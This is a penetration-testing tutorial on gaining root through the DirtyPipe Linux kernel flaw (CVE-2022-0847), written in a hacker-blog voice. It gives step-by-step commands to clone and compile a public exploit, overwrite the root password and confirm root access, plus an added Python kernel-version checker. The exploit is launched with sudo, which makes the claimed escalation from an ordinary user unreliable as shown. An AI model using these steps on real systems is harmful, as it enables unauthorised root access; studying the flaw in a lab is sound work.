Welcome back, my aspiring cyberwarriors!
Often, after successfully compromising a system, we are limited to the privileges of the compromised user. Regular users on systems usually have very limited privileges and cannot access many of the resources or make changes to their systems and resources (databases, etc.). This is one of the many ways that good system administrators secure their networks.
Although they have limited privileges, regular users are usually easier to compromise than the system administrator, as they are usually less security-aware. They are more prone to fall for malicious links and other social engineering attacks and often use weak passwords. For all of these reasons, you are far more likely to compromise a regular user with limited privileges than a system administrator with root or system admin privileges.
To take control of the systems and network, you will need to escalate privileges to the system administrator, or root on Linux systems. There is a large variety of techniques for escalating privileges, including:
Kernel Exploits
SUID/SGID misconfigurations
sudo
commands with escape characters
Service Exploits
Weak File Permissions
Environment Variables
Abusing Intended Functionality
In this tutorial, we will examine a kernel privilege escalation exploit named DirtyPipe. It was found by Max Kellermann and assigned CVE-2022-0847.
DirtyPipe is a local privilege escalation vulnerability in the Linux kernel that allows a local attacker to bypass ANY file permissions and write arbitrary data to any file under certain conditions. This means that files such as /etc/shadow, where the system's password hashes are stored, can be overwritten with a new password.
Let's test this potential local privilege escalation exploit on Kali 2021.
Step #1: Testing for the Vulnerability
The first step is to determine whether your Linux kernel is vulnerable to Dirty Pipe. In this case, I'm using Kali 2021.
We know that Linux kernels from 5.8 onward are vulnerable and that this vulnerability was patched in 5.16. We can identify the Linux kernel version by using the uname command in Linux.
kali > uname -a
As you can see, this version of Kali uses Linux kernel 5.10.0. This may make it vulnerable to Dirty Pipe, as this release lies between the first vulnerable kernel version and the patched kernel versions!
To be more certain, let's download the DirtyPipe checker. It is available on GitHub; clone it with git:
kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
Next, navigate to the new directory.
kali > cd CVE-2022-0847-dirty-pipe-checker
Now, execute the dpipe.sh script from inside that directory:
kali > sudo ./dpipe.sh
As you can see above, this vulnerability checker confirmed that this Linux kernel is vulnerable to the Dirty Pipe privilege escalation exploit!
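As an added example (not code from this tutorial or from the dpipe.sh checker project), the following Python script performs the version check from Step #1 against `uname -r` strings, using the upstream kernel releases that shipped the fix (5.10.102, 5.15.25 and 5.16.11; 5.8 up to those releases is affected, 5.17 and later never were). The sample release strings are constructed, and the check assumes a stock upstream version number, so a distribution kernel that backports the fix without changing its version will still be reported as affected, which is why the behavioural dpipe.sh test is the more reliable answer.

```python
import re
import subprocess

# Upstream kernel versions that introduced and fixed CVE-2022-0847 (Dirty Pipe).
FIRST_AFFECTED = (5, 8, 0)
# Stable branches that received the fix upstream, and the first fixed release on each.
FIXED_IN = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}
LAST_AFFECTED_MINOR = 16  # 5.17 was released with the fix already in place

# Constructed sample `uname -r` strings, not output captured from any real host.
SAMPLE_RELEASES = [
    "5.10.0-kali9-amd64",   # the Kali 2021 kernel version seen in the tutorial
    "5.16.10-arch1-1",
    "5.16.11-arch1-1",
    "5.7.19-generic",
    "6.1.0-kali5-amd64",
]

def parse_release(release):
    """Turn a `uname -r` string such as '5.10.0-kali9-amd64' into (major, minor, patch)."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)

def dirty_pipe_affected(release):
    """True if the upstream version in `release` falls in the CVE-2022-0847 range.
    Version numbers only: distro backports of the fix are invisible to this check."""
    version = parse_release(release)
    if version < FIRST_AFFECTED or version[:2] > (5, LAST_AFFECTED_MINOR):
        return False
    fixed = FIXED_IN.get(version[:2])
    if fixed is None:
        # 5.8, 5.9 and 5.11 to 5.14 went end-of-life upstream without the fix.
        return True
    return version < fixed

def check_running_kernel():
    """Run the check against the kernel this script is executing on."""
    out = subprocess.run(["uname", "-r"], capture_output=True, text=True, check=True).stdout
    return out.strip(), dirty_pipe_affected(out)

if __name__ == "__main__":
    for release in SAMPLE_RELEASES:
        print(f"{release:24} {'AFFECTED' if dirty_pipe_affected(release) else 'not affected'}")
    release, affected = check_running_kernel()
    print(f"this host ({release}): {'AFFECTED' if affected else 'not affected'} by version number")
```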
Step #2: Download the Exploit
Now that we know that this Linux version is vulnerable, let's attempt to exploit it to get root privileges.
First, download the exploit:
kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Next, navigate to the new directory.
kali > cd CVE-2022-0847-DirtyPipe-Exploits
Now that we are in that directory, let's look inside.
kali > ls -l
As you can see above, there are two exploits and one compile script. We need to run the compile script to use these exploits. The compile script will compile both exploits automatically.
kali > sudo ./compile.sh
After you do so, the two compiled exploit binaries will appear in green in the ls listing (marking them executable) and be ready to run.
Let's run exploit-1 first.
kali > sudo ./exploit-1
It appears to have worked and changed the root password to "piped"!
Step #3: Login as Root
Let's now test to see whether we can login as root.
kali > su root
Next, enter the new password "piped".
After doing so, enter the Linux command whoami:
root
To further confirm that you have root privileges, try running the Linux command id:
uid=0(root) groups=0(root), ........
Success! Now you have root privileges on the system and can do whatever you want!
Summary
Escalating privileges is one of the key skills of a penetration tester/hacker. In many cases, we exploit an ordinary user without the privileges we need to take control of the system/network. The DirtyPipe kernel exploit is an excellent tool for escalating privileges on Linux systems running kernels released in approximately 2021-2022.